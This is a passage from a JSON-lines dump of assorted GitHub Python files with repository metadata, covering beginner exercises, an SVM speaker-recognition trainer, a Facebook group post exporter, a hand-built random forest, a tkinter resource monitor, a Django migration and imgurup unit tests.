lists)\"\n \" of integers/floats\")\n if not all(isinstance(num, (int, float)) for row in matrix for num in row):\n raise TypeError(\"matrix must be a matrix (list of lists)\"\n \" of integers/floats\")\n row_sizes = [len(row) for row in matrix]\n if not all(size == row_sizes[0] for size in row_sizes):\n raise TypeError(\"Each row of the matrix must have the same size\")\n if not isinstance(div, (int, float)):\n raise TypeError(\"div must be a number\")\n if div == 0:\n raise TypeError(\"division by zero\")\n\n return [list(map(lambda x: round(x / div, 2), row)) for row in matrix]\n","repo_name":"mwesigwa2/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/2-matrix_divided.py","file_name":"2-matrix_divided.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11540358636","text":"## Tuple's ##\r\n\r\n# 1) Define a Tuple\r\n# 2) Indexing in Tuple's\r\n# 3) Difference between the List and Tuple\r\n\r\n# 1) Define a Tuple\r\n\r\nprime_numbers = (2,3,5,7,11)\r\ntype(prime_numbers)\r\n\r\nperfect_squares = [1,4,9,16,25,36]\r\ntype(perfect_squares)\r\n\r\nlen(prime_numbers)\r\nlen(perfect_squares)\r\n\r\nmy_tuple = (\"Hieee\", 100, 12.47)\r\nmy_tuple\r\ntype(my_tuple)\r\n\r\n# 2) Indexing in Tuple's\r\nmy_tuple[0]\r\nmy_tuple[1]\r\nmy_tuple[0:2]\r\nmy_tuple[-1]\r\n\r\nmy_tuple.count(100)\r\n\r\n\r\n# 3) Difference between the List and Tuple\r\n\r\nl = [\"a\", \"b\", \"c\", \"d\", \"e\"]\r\nt= (\"a\", \"b\", \"c\", \"d\", \"e\")\r\ntype(l)\r\ntype(t)\r\n\r\nl[0] = \"New Element\"\r\nl\r\nt[0] = \"New Element\" # tuple is immutable sequence of objects\r\n","repo_name":"JN1995/Programming-Languages","sub_path":"python for Beginner/datatype/Tuples.py","file_name":"Tuples.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"886032596","text":"from sklearn import svm, metrics\nfrom sklearn.model_selection import train_test_split\nfrom classes.sample import Sample\nimport joblib\n\n\n\n\npredictSample = []\n\nB = Sample(\"./out/blaise_processed.wav\")\nJM = Sample(\"./out/julien_processed.wav\")\nYM = Sample(\"./out/marguet_processed.wav\")\nV = Sample(\"./out/valerie_processed.wav\")\nY = Sample(\"./out/yacine_processed.wav\")\n\n\nmerged, target = Sample.concat()\n\nx_train, x_test, y_train, y_test = train_test_split(merged, target)\nclf = svm.SVC(probability=True)\nclf.fit(x_train, y_train)\n\n\n\n\nres = clf.predict(x_test)\nres = res.tolist()\n\n\nprint(\"Accuracy was : \", metrics.accuracy_score(y_test, res))\n\njoblib.dump(clf, \"./model/model.pkl\") ","repo_name":"MartTave/SpeakerRecognition","sub_path":"training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36217121972","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Oct 26 21:52:51 2019\r\n\r\n@author: Dominick\r\n\"\"\"\r\n\r\nimport sqlite3\r\nimport random\r\nimport time\r\nimport PIL\r\n#import nltk\r\n#from nltk.stem.lancaster import LancasterStemmer\r\n# word stemmer\r\n#stemmer = LancasterStemmer()\r\n\r\nfrom time import sleep\r\nfrom facepy import GraphAPI\r\nfrom io import BytesIO\r\nfrom PIL import Image\r\n\r\nimport xlsxwriter\r\n\r\nclass extract_posts():\r\n def __init__(self, group_id, api_key):\r\n '''\r\n Initilize: Store the group's ID and the apikey associated with the group\r\n Facepy API key is key otherwisse, we can't scrap any data\r\n '''\r\n self.grp_id = group_id\r\n #the API key make sure to get this\r\n self.face_py = api_key\r\n \r\n def open_workbook(self, col_nmes, out_file):\r\n '''\r\n Opens an excel sheet and 1 sheetr for use. \r\n I'm considering adding a way to add a second sheet\r\n \r\n Note: this function may act weird if it tries to read a comment \r\n associate with your account.\r\n So if the account you have that has the facepy app associated with \r\n it and you made a comment, there's no \"Name\" key when you look for the username\r\n of an account that facepy is associated with. \r\n \r\n I've also made it so that comments are \"indented\" inter the post\r\n they're associated with. At most, we'll have two comment layers as that's Facebook's limit\r\n \r\n \r\n '''\r\n wb = xlsxwriter.Workbook(out_file)\r\n sheet1 = wb.add_worksheet()\r\n cnt = 0\r\n for i in col_nmes:\r\n sheet1.set_column(cnt,cnt,70)\r\n sheet1.write(0, cnt, i)\r\n cnt += 1\r\n return wb, sheet1\r\n \r\n def extract_posts(self, output_file):\r\n '''\r\n Extracts the posts\r\n '''\r\n #initilize graph \r\n graph = GraphAPI(self.face_py)\r\n col_names = [\"Poster\", \"Message\", \"Time\"]\r\n #open a workbook\r\n wb, sheet1 = self.open_workbook(col_names, output_file)\r\n sheet1.set_column(3,3,70)\r\n sheet1.set_column(4,4,40)\r\n sheet1.set_column(5,5,40)\r\n \r\n #the group feed we're extracting from \r\n x = graph.get(path = str(self.grp_id) + '/feed', page = False, retry = 3)\r\n cnt = 1\r\n for i in range(len(x['data'])):\r\n if(\"message\" in x['data'][i].keys()):\r\n #the post we're extracting from\r\n y = graph.get(path = str(x['data'][i][\"id\"]) + \"?fields=from\", \r\n page = False, retry = 3)\r\n \r\n if \"from\" in y.keys():\r\n name = (y[\"from\"][\"name\"])\r\n else:\r\n name = \"(you)\"\r\n sheet1.write(cnt, 0, name) \r\n sheet1.write(cnt, 1, x['data'][i]['message']) \r\n sheet1.write(cnt, 2, x['data'][i]['updated_time']) \r\n \r\n #comments library\r\n comments = graph.get(path = str(x['data'][i][\"id\"]) + \"?fields=comments\", \r\n page = False, retry = 3)\r\n #checking if there are comments\r\n if \"comments\" in comments.keys():\r\n for i in range(len(comments[\"comments\"][\"data\"])):\r\n cnt += 1\r\n sheet1.write(cnt, 1, comments[\"comments\"][\"data\"][i][\"from\"][\"name\"]) \r\n sheet1.write(cnt, 2, comments[\"comments\"][\"data\"][i]['message']) \r\n sheet1.write(cnt, 3, comments[\"comments\"][\"data\"][i]['created_time'])\r\n comments_2nd_layer = graph.get(path = str(comments[\"comments\"][\"data\"][i][\"id\"]) + \"?fields=comments\", \r\n page = False, retry = 3)\r\n \r\n #checking of comments are in the comments. There are ony two layers\r\n if \"comments\" in comments_2nd_layer.keys():\r\n for i in range(len(comments_2nd_layer[\"comments\"][\"data\"])):\r\n cnt += 1\r\n sheet1.write(cnt, 2, (comments_2nd_layer[\"comments\"][\"data\"][i][\"from\"][\"name\"])) \r\n sheet1.write(cnt, 3, comments_2nd_layer[\"comments\"][\"data\"][i]['message']) \r\n sheet1.write(cnt, 4, comments_2nd_layer[\"comments\"][\"data\"][i]['created_time'])\r\n \r\n cnt += 1\r\n #close workbook\r\n wb.close()\r\n \r\n ","repo_name":"edtsoi430/Townhall.digital","sub_path":"get_posts_and_userid.py","file_name":"get_posts_and_userid.py","file_ext":"py","file_size_in_byte":4588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16059039554","text":"\"\"\"\n-*- coding: utf-8 -*-\n@File : 最大子数组和-动态规划.py\n@Time : 2022/4/10\n@Author: Tk \n@Software: PyCharm\n\n输入:\n-2,1,-3,4,-1,2,1,-5,4\n输出:\n6\n\"\"\"\nnums = list(map(int, input().split(\",\")))\n\n\nclass Solution:\n def maxSubArray(self, nums) -> int:\n n = len(nums)\n temp = nums[-1]\n max_num = temp\n for i in range(n-2, -1, -1):\n temp = temp + nums[i] if temp > 0 else nums[i]\n max_num = max(max_num, temp)\n\n return max_num\n\n\ns = Solution()\nresult = s.maxSubArray(nums)\nprint(result)\n","repo_name":"looking-for-my-magic-bean/leetcode","sub_path":"TOP100/数组/最大子数组和-动态规划.py","file_name":"最大子数组和-动态规划.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25079817275","text":"import unittest\nimport utils.logger\n\nfrom training.expression import Expression\nfrom knowledge import knn_colour\n\nutils.logger.display_log(\"langframe.data.ColourLogger\")\n\nclass TestAddingExpressions(unittest.TestCase):\n def setUp(self):\n self.knowledge = knn_colour.KNNColourSemantics(\"example\")\n\n def testLearnSingle(self):\n red_expr = Expression([\"COLOUR\", \"r_255\", \"g_0\", \"b_10\"])\n self.knowledge.learn(\"red\", red_expr)\n self.assertIn((255, 0, 10), self.knowledge.points)\n self.assertIn(\"red\", self.knowledge.words)\n\n def testKNearest(self):\n black_expr = Expression([\"COLOUR\", \"r_0\", \"g_0\", \"b_0\"])\n dark_red = Expression([\"COLOUR\", \"r_125\", \"g_0\", \"b_0\"])\n reddish_expr = Expression([\"COLOUR\", \"r_250\", \"g_25\", \"b_30\"])\n\n self.knowledge.learn(\"black\", black_expr)\n self.knowledge.learn(\"red\", dark_red)\n self.knowledge.learn(\"red\", reddish_expr)\n\n self.knowledge.word_for(Expression([\"COLOUR\", \"r_255\", \"g_0\", \"b_0\"]))\n self.assertTrue(False)\n\n\n def testNoColourLabel(self):\n black_expr = Expression([\"COLOUR\", \"r_0\", \"g_0\", \"b_0\"])\n dark_red = Expression([\"COLOUR\", \"r_125\", \"g_0\", \"b_0\"])\n reddish_expr = Expression([\"COLOUR\", \"r_250\", \"g_25\", \"b_30\"])\n\n self.knowledge.learn(\"black\", black_expr)\n self.knowledge.learn(\"red\", dark_red)\n self.knowledge.learn(\"red\", reddish_expr)\n\n self.assertEqual(self.knowledge.expression_for(\"blue\"), Expression(\"MISUNDERSTOOD\"))\n\n def testReturnColourValue(self):\n black_expr = Expression([\"COLOUR\", \"r_0\", \"g_0\", \"b_0\"])\n dark_red = Expression([\"COLOUR\", \"r_125\", \"g_0\", \"b_0\"])\n reddish_expr = Expression([\"COLOUR\", \"r_250\", \"g_25\", \"b_30\"])\n\n self.knowledge.learn(\"black\", black_expr)\n self.knowledge.learn(\"red\", dark_red)\n self.knowledge.learn(\"red\", reddish_expr)\n\n self.knowledge.expression_for(\"red\")\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"samwhitehall/langframe","sub_path":"knowledge/tests/colour_test.py","file_name":"colour_test.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27247890110","text":"\n# Creating some colors\nBLUE = (0, 0, 255)\nGRAYBLUE = (50, 120, 120)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\n\n# define directions\nUP = 0\nDOWN = 2\nLEFT = 1\nRIGHT = 3\n\nSENSOR = 2\nSENSOR_COUNT = 5\nANT_MOVES = 5\nBATTERY_STATUS = 70\n\n# The information heuristic factor\nALPHA = 1.9\n# the expectation heuristic factor\nBETA = 0.9\n\n# define indexes variations\nDIRECTIONS = [[-1, 0], [1, 0], [0, 1], [0, -1]]\n\nINF = 999999","repo_name":"GeorgeDanicico/Artificial-Intelligence-Year2","sub_path":"Assignment4/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8644307415","text":"import random\nimport pandas as pd\nimport numpy as np\n\ndef entropy(p):\n if p == 0:\n return 0\n elif p == 1:\n return 0\n else:\n return - (p * np.log2(p) + (1 - p) * np.log2(1-p))\n\ndef information_gain(left_child, right_child):\n parent = left_child + right_child\n p_parent = parent.count(1) / len(parent) if len(parent) > 0 else 0\n p_left = left_child.count(1) / len(left_child) if len(left_child) > 0 else 0\n p_right = right_child.count(1) / len(right_child) if len(right_child) > 0 else 0\n IG_p = entropy(p_parent)\n IG_l = entropy(p_left)\n IG_r = entropy(p_right)\n return IG_p - len(left_child) / len(parent) * IG_l - len(right_child) / len(parent) * IG_r\n\ndef draw_bootstrap(X_train, y_train):\n bootstrap_indices = list(np.random.choice(range(len(X_train)), len(X_train), replace = True))\n oob_indices = [i for i in range(len(X_train)) if i not in bootstrap_indices]\n X_bootstrap = X_train.iloc[bootstrap_indices].values\n y_bootstrap = y_train[bootstrap_indices]\n X_oob = X_train.iloc[oob_indices].values\n y_oob = y_train[oob_indices]\n return X_bootstrap, y_bootstrap, X_oob, y_oob\n\ndef oob_score(tree, X_test, y_test):\n mis_label = 0\n for i in range(len(X_test)):\n pred = predict_tree(tree, X_test[i])\n if pred != y_test[i]:\n mis_label += 1\n return mis_label / len(X_test)\n\ndef find_split_point(X_bootstrap, y_bootstrap, max_features):\n feature_ls = list()\n num_features = len(X_bootstrap[0])\n\n while len(feature_ls) <= max_features:\n feature_idx = random.sample(range(num_features), 1)\n if feature_idx not in feature_ls:\n feature_ls.extend(feature_idx)\n\n best_info_gain = -999\n node = None\n for feature_idx in feature_ls:\n for split_point in X_bootstrap[:,feature_idx]:\n left_child = {'X_bootstrap': [], 'y_bootstrap': []}\n right_child = {'X_bootstrap': [], 'y_bootstrap': []}\n\n # split children for continuous variables\n if type(split_point) in [int, float]:\n for i, value in enumerate(X_bootstrap[:,feature_idx]):\n if value <= split_point:\n left_child['X_bootstrap'].append(X_bootstrap[i])\n left_child['y_bootstrap'].append(y_bootstrap[i])\n else:\n right_child['X_bootstrap'].append(X_bootstrap[i])\n right_child['y_bootstrap'].append(y_bootstrap[i])\n # split children for categoric variables\n else:\n for i, value in enumerate(X_bootstrap[:,feature_idx]):\n if value == split_point:\n left_child['X_bootstrap'].append(X_bootstrap[i])\n left_child['y_bootstrap'].append(y_bootstrap[i])\n else:\n right_child['X_bootstrap'].append(X_bootstrap[i])\n right_child['y_bootstrap'].append(y_bootstrap[i])\n\n split_info_gain = information_gain(left_child['y_bootstrap'], right_child['y_bootstrap'])\n if split_info_gain > best_info_gain:\n best_info_gain = split_info_gain\n left_child['X_bootstrap'] = np.array(left_child['X_bootstrap'])\n right_child['X_bootstrap'] = np.array(right_child['X_bootstrap'])\n node = {'information_gain': split_info_gain,\n 'left_child': left_child,\n 'right_child': right_child,\n 'split_point': split_point,\n 'feature_idx': feature_idx}\n\n return node\n\ndef terminal_node(node):\n y_bootstrap = node['y_bootstrap']\n pred = max(y_bootstrap, key = y_bootstrap.count)\n return pred\n\n\ndef split_node(node, max_features, min_samples_split, max_depth, depth):\n left_child = node['left_child']\n right_child = node['right_child']\n\n del(node['left_child'])\n del(node['right_child'])\n\n if len(left_child['y_bootstrap']) == 0 or len(right_child['y_bootstrap']) == 0:\n empty_child = {'y_bootstrap': left_child['y_bootstrap'] + right_child['y_bootstrap']}\n node['left_split'] = terminal_node(empty_child)\n node['right_split'] = terminal_node(empty_child)\n return\n\n if depth >= max_depth:\n node['left_split'] = terminal_node(left_child)\n node['right_split'] = terminal_node(right_child)\n return node\n\n if len(left_child['X_bootstrap']) <= min_samples_split:\n node['left_split'] = node['right_split'] = terminal_node(left_child)\n else:\n node['left_split'] = find_split_point(left_child['X_bootstrap'], left_child['y_bootstrap'], max_features)\n split_node(node['left_split'], max_depth, min_samples_split, max_depth, depth + 1)\n if len(right_child['X_bootstrap']) <= min_samples_split:\n node['right_split'] = node['left_split'] = terminal_node(right_child)\n else:\n node['right_split'] = find_split_point(right_child['X_bootstrap'], right_child['y_bootstrap'], max_features)\n split_node(node['right_split'], max_features, min_samples_split, max_depth, depth + 1)\n\ndef build_tree(X_bootstrap, y_bootstrap, max_depth, min_samples_split, max_features):\n root_node = find_split_point(X_bootstrap, y_bootstrap, max_features)\n split_node(root_node, max_features, min_samples_split, max_depth, 1)\n return root_node\n\ndef random_forest(X_train, y_train, n_estimators, max_features, max_depth, min_samples_split):\n tree_ls = list()\n oob_ls = list()\n for i in range(n_estimators):\n X_bootstrap, y_bootstrap, X_oob, y_oob = draw_bootstrap(X_train, y_train)\n tree = build_tree(X_bootstrap, y_bootstrap, max_features, max_depth, min_samples_split)\n tree_ls.append(tree)\n oob_error = oob_score(tree, X_oob, y_oob)\n oob_ls.append(oob_error)\n #print(\"OOB estimate: {:.2f}\".format(np.mean(oob_ls)))\n return tree_ls\n\ndef predict_tree(tree, X_test):\n feature_idx = tree['feature_idx']\n\n if X_test[feature_idx] <= tree['split_point']:\n if type(tree['left_split']) == dict:\n return predict_tree(tree['left_split'], X_test)\n else:\n value = tree['left_split']\n return value\n else:\n if type(tree['right_split']) == dict:\n return predict_tree(tree['right_split'], X_test)\n else:\n return tree['right_split']\n \ndef predict_rf(tree_ls, X_test):\n pred_ls = list()\n for i in range(len(X_test)):\n ensemble_preds = [predict_tree(tree, X_test.values[i]) for tree in tree_ls]\n final_pred = max(ensemble_preds, key = ensemble_preds.count)\n pred_ls.append(final_pred)\n return np.array(pred_ls)\n\ndef feature_selection(X, y, k):\n # Calculate the correlation coefficients between each feature and the y variable\n correlations = np.array([np.corrcoef(X[:, i], y)[0, 1] for i in range(X.shape[1])])\n \n # Get the absolute values of the correlation coefficients\n abs_correlations = np.abs(correlations)\n \n # Select the top 'k' features with the highest absolute correlation coefficients\n top_k_indices = np.argsort(abs_correlations)[-k:]\n x_selected = X[:, top_k_indices]\n \n return x_selected, top_k_indices\n\ndef feature_selection_value(X, y, feature_names = 'original_column_names'):\n # Calculate the correlation coefficients between each feature and the y variable\n correlations = np.array([np.corrcoef(X[:, i], y)[0, 1] for i in range(X.shape[1])])\n \n # Get the absolute values of the correlation coefficients\n abs_correlations = np.abs(correlations)\n \n # Sort the features by ascending order of absolute correlation coefficients\n sorted_indices = np.argsort(abs_correlations)\n sorted_correlations = abs_correlations[sorted_indices]\n sorted_features = [feature_names[i] for i in sorted_indices]\n\n return sorted_features, sorted_correlations\n\ndef cross_validation_ConfusionMatrix(X, y, k):\n\n \"\"\"\n Performs k-fold cross-validation on the input model using the input data.\n \n Args:\n model: a function or callable class that takes in X_train and y_train as arguments and returns a trained model.\n X: a numpy array of input features.\n y: a numpy array of target labels.\n k: an integer indicating the number of folds for cross-validation.\n \n Returns:\n avg_score: a float representing the average score across all folds.\n confusion_matrix: a 2*2 numpy array\n \"\"\"\n # Define the number of classes\n num_classes = 2\n\n # Initialize the confusion matrix\n confusion_matrix = np.zeros((num_classes, num_classes))\n\n # Split the data into k folds\n X_folds = np.array_split(X, k)\n y_folds = np.array_split(y, k)\n \n fold_accuracies = []\n\n # Loop through each fold\n for i in range(k):\n # Set up training and testing data for this fold\n X_train = np.concatenate(X_folds[:i] + X_folds[i+1:])\n y_train = np.concatenate(y_folds[:i] + y_folds[i+1:])\n X_test = X_folds[i]\n y_test = y_folds[i]\n \n if isinstance(X_train, np.ndarray):\n # Train the model on the training data\n model = random_forest(pd.DataFrame(X_train), y_train, n_estimators=100, max_features=5, max_depth=10, min_samples_split=1)\n preds = predict_rf(model, pd.DataFrame(X_test)).flatten()\n \n \n # Calculate the accuracy for this fold\n fold_accuracy = sum(preds == y_test) / len(y_test)\n fold_accuracies.append(fold_accuracy)\n \n # Iterate over each example\n for j in range(len(y_test)):\n true_class = y_test[j]\n pred_class = preds[j]\n confusion_matrix[true_class, pred_class] += 1\n \n # Calculate the mean accuracy as the final accuracy\n mean_accuracy = np.mean(fold_accuracies)\n\n return mean_accuracy, confusion_matrix\n\n\ndef train_test_split(X, y, test_size=0.25, random_state=None):\n \"\"\"\n Split arrays or matrices into random train and test subsets.\n\n Parameters\n ----------\n X : numpy array-like, shape (n_samples, n_features)\n The input data.\n\n y : numpy array-like, shape (n_samples,)\n The target values.\n\n test_size : float, optional (default=0.25)\n The proportion of the dataset to include in the test split.\n\n random_state : int or RandomState, optional (default=None)\n If int, random_state is the seed used by the random number generator;\n If RandomState instance, random_state is the random number generator.\n\n Returns\n -------\n X_train : numpy array-like, shape (n_train_samples, n_features)\n The training input samples.\n\n X_test : numpy array-like, shape (n_test_samples, n_features)\n The test input samples.\n\n y_train : numpy array-like, shape (n_train_samples,)\n The training target values.\n\n y_test : numpy array-like, shape (n_test_samples,)\n The test target values.\n \"\"\"\n\n # Set random seed if specified\n if random_state is not None:\n np.random.seed(random_state)\n\n # Get number of samples\n n_samples = X.shape[0]\n\n # Shuffle indices\n indices = np.random.permutation(n_samples)\n\n # Calculate number of test samples\n n_test_samples = int(test_size * n_samples)\n\n # Get test indices\n test_indices = indices[:n_test_samples]\n\n # Get train indices\n train_indices = indices[n_test_samples:]\n\n # Split data into train and test subsets\n X_train = X[train_indices]\n X_test = X[test_indices]\n y_train = y[train_indices]\n y_test = y[test_indices]\n\n return X_train, X_test, y_train, y_test\n\ndef calculate_feature_importance(X, y, model, column_names):\n \"\"\"\n Calculate the feature importance for a random forest model without using sklearn.\n \n Parameters:\n X (numpy.ndarray): The input feature matrix.\n y (numpy.ndarray): The target variable array.\n model (numpy.ndarray): The trained random forest model.\n column_names (list): The names of columns\n \n Returns:\n pandas.DataFrame: A dataframe containing the feature importance values sorted in descending order.\n \"\"\"\n \n # Get the number of features\n n_features = X.shape[1]\n \n # Initialize an empty array to hold the importance scores\n importance = np.zeros(n_features)\n \n # Calculate the importance of each feature\n for i in range(n_features):\n # Get the predictions for the original data\n y_pred = predict_rf(model, pd.DataFrame(X))\n\n # Shuffle the values of the ith feature\n X_shuffled = X.copy()\n np.random.shuffle(X_shuffled[:, i])\n\n # Get the predictions for the shuffled data\n y_pred_shuffled = predict_rf(model, pd.DataFrame(X_shuffled))\n\n # Calculate the importance score as the difference in accuracy\n importance[i] = np.mean((y_pred - y_pred_shuffled) ** 2)\n\n # Normalize the importance scores\n importance = importance / np.sum(importance)\n\n # Create a pandas dataframe with the importance scores and feature names\n feature_names = [column_names[i] for i in range(n_features)]\n importance_df = pd.DataFrame({\"importance\": importance, \"feature\": feature_names})\n\n # Sort the dataframe in descending order of importance\n importance_df = importance_df.sort_values(\"importance\", ascending=False).reset_index(drop=True)\n\n return importance_df\n\ndef cross_validate(model, X, y, k = 3):\n \"\"\"\n Performs k-fold cross-validation on the input model using the input data.\n \n Args:\n model: a function or callable class that takes in X_train and y_train as arguments and returns a trained model.\n X: a numpy array of input features.\n y: a numpy array of target labels.\n k: an integer indicating the number of folds for cross-validation.\n \n Returns:\n avg_score: a float representing the average score across all folds.\n \"\"\"\n\n # Split the data into k folds\n X_folds = np.array_split(X, k)\n y_folds = np.array_split(y, k)\n \n scores = []\n # Perform k-fold cross-validation\n for i in range(k):\n # Set up training and testing data for this fold\n X_train = np.concatenate(X_folds[:i] + X_folds[i+1:])\n y_train = np.concatenate(y_folds[:i] + y_folds[i+1:])\n X_test = X_folds[i]\n y_test = y_folds[i]\n \n X_train = pd.DataFrame(X_train)\n\n # Train the model on the training data\n model = random_forest(X_train, y_train, n_estimators=100, max_features=5, max_depth=10, min_samples_split=2)\n \n preds = predict_rf(model, pd.DataFrame(X_test)).flatten()\n acc_score = sum(preds == y_test) / len(y_test)\n # Evaluate the model on the testing data\n scores.append(acc_score)\n \n # Calculate the average score across all folds\n avg_score = sum(scores) / k\n \n return avg_score","repo_name":"acloop62hz/Colorectal-Liver-Metastases-Recurrence-Prediction-from-Clinical-and-CT-Image-Data","sub_path":"Random_Forest/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":14848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70131141492","text":"from bpsk_dsss.utils import get_repeated_bits_count\nfrom math import floor, log10\n\n\nsymbol_length_bits = 8 # bits per symbol\nsample_rate = 32768 # samples per second\nsymbol_rate = 1 # symbols(characters) per second\nsample_rate_power = round(log10(sample_rate))\n\nmodulation_carrier_frequency = 128\nmodulation_carrier_amplitude = 1\n\ndemodulation_filter_order = 6\ndemodulation_filter_cutoff_frequency = modulation_carrier_frequency/2\n\ndsss_code_frequency = 32\n\noriginal_signal_path = './data/test_bpsk_dsss.raw'\nmodulated_signal_path = './data/test_bpsk_dsss_modulated.raw'\ndecoded_signal_path = './data/test_bpsk_dsss_decoded.raw'\nresults_path = './data/results/'\n\n# original_signal_data = 'Hello, World!'\noriginal_signal_data = 'Prenosni sistemi'\n\n\nplot_subsample_start = floor(1e4)\nplot_subsample_length = floor(1e5)/4\nplot_subsample_end = floor(plot_subsample_start + plot_subsample_length)\nplot_subsample_downsample_factor = 1\nplot_filetype = '.svg'\n# plot_filetype = '.png'\n\n# Test the configuration:\nrepeated_bits_count = get_repeated_bits_count(sample_rate, symbol_rate, symbol_length_bits)\n\nnoise_amplitude = 8\n","repo_name":"ZigaBobnar/gps-signal-analysis","sub_path":"bpsk_dsss/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12324851407","text":"from tkinter.constants import BOTH, CENTER, E, LEFT, RIGHT, TOP, W, YES, X\nimport psutil\nimport tkinter as tk\n\ndef main():\n def gui():\n root = tk.Tk()\n root.title(\"STATS\")\n root.attributes('-topmost', True)\n\n #Change the name in the window\n def change_label(labelname, text):\n labelname.configure(text=text)\n\n def mem_stats():\n return str(round(psutil.virtual_memory().total/1000000)) + '/' + str(round(psutil.virtual_memory().used/1000000))\n\n def update_usage():\n change_label(label_cpu_percentage, psutil.cpu_percent())\n change_label(label_mem_percentage, psutil.virtual_memory().percent)\n change_label(label_mem_used, mem_stats())\n root.after(300, update_usage)\n\n frame_cpu = tk.Frame(root)\n\n label_cpu = tk.Label(frame_cpu, text='CPU', font='Calibri 18',width=10, anchor=W)\n label_cpu_percentage = tk.Label(frame_cpu, text=psutil.cpu_percent(), font='Calibri 18',width=10, anchor=W)\n label_cpu.pack(side=LEFT,fill=X)\n label_cpu_percentage.pack(side=LEFT,fill=X)\n\n frame_cpu.pack(fill=BOTH, expand=YES)\n\n frame_mem = tk.Frame(root)\n\n label_mem = tk.Label(frame_mem, text='MEM', font='Calibri 18',width=10, anchor=W)\n label_mem_percentage = tk.Label(frame_mem, text=psutil.virtual_memory().percent, font='Calibri 18',width=10, anchor=W)\n\n label_mem_used = tk.Label(frame_mem, text=mem_stats(), font='Calibri 18',width=10, anchor=W)\n\n label_mem.pack(side=LEFT,fill=X)\n label_mem_percentage.pack(side=LEFT,fill=X)\n label_mem_used.pack(side=LEFT,fill=X)\n\n frame_mem.pack(fill=BOTH, expand=YES)\n\n \n root.after(300, update_usage)\n\n root.mainloop()\n\n gui()\n\nif __name__ == \"__main__\":\n main()","repo_name":"AdmiralPuni/trawler","sub_path":"performance-stat.pyw","file_name":"performance-stat.pyw","file_ext":"pyw","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71280394933","text":"import urllib.request\n\nfile = urllib.request.urlopen('http://data.pr4e.org/romeo.txt')\nwords = dict()\n\nfor line in file:\n for word in line.decode().rstrip().split():\n words[word] = words.get(word, 0) + 1\n\nprint(words)\n","repo_name":"sitek94/python","sub_path":"12_networking/web_browser_with_urllib.py","file_name":"web_browser_with_urllib.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"8039883244","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('pet', '0003_auto_20160624_1630'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='activity',\n name='activity_pet_type',\n field=models.IntegerField(default=0),\n ),\n migrations.AddField(\n model_name='activity',\n name='activity_price',\n field=models.DecimalField(default=0.0, max_digits=20, decimal_places=2),\n ),\n ]\n","repo_name":"IpursueI/tencent_mini","sub_path":"mini/pet/migrations/0004_auto_20160625_0809.py","file_name":"0004_auto_20160625_0809.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"11903204584","text":"from __future__ import unicode_literals\n\nimport pytest\n\nimport mock\nfrom mock import call\nfrom mock import patch\nimport httpretty\nimport pytest_httpretty\n\nimport io\nimport sys\nimport os\n\nimport imgurup\nfrom imgurup import CLIImgur\nfrom imgurup import MacImgur\nfrom imgurup import KDEImgur\nfrom imgurup import ZenityImgur\n\n\ndef get_builtin_name(builtin_name):\n name = ('builtins.%s' if sys.version_info >= (3,) else '__builtin__.%s') % builtin_name\n return name\n\n\nclass TestImgurFactory:\n\n def setup(self):\n from imgurup import ImgurFactory\n self.ImgurFactory = ImgurFactory\n self.imgurFactory = ImgurFactory()\n\n def test_init(self):\n assert self.ImgurFactory\n\n @pytest.fixture(scope='function')\n def mock_sys(self, request):\n m = mock.patch('imgurup.sys')\n ret = m.start()\n request.addfinalizer(m.stop)\n return ret\n\n def test_get_instance_cli(self, monkeypatch):\n monkeypatch.delenv('KDE_FULL_SESSION', raising=False)\n monkeypatch.delenv('DESKTOP_SESSION', raising=False)\n monkeypatch.setattr(imgurup.sys, 'platform', None)\n prefer_gui = True\n assert type(self.ImgurFactory.get_instance(prefer_gui)) == CLIImgur\n prefer_gui = False\n assert type(self.ImgurFactory.get_instance(prefer_gui)) == CLIImgur\n\n def test_get_instance_kde(self, monkeypatch):\n monkeypatch.setenv('KDE_FULL_SESSION', 'true')\n monkeypatch.setenv('DESKTOP_SESSION', '')\n monkeypatch.setattr(imgurup.sys, 'platform', 'linux2')\n prefer_gui = True\n assert type(self.ImgurFactory.get_instance(prefer_gui)) == KDEImgur\n\n def test_get_instance_mac(self, monkeypatch):\n monkeypatch.delenv('KDE_FULL_SESSION', raising=False)\n monkeypatch.delenv('DESKTOP_SESSION', raising=False)\n monkeypatch.setattr(imgurup.sys, 'platform', 'darwin')\n prefer_gui = True\n assert 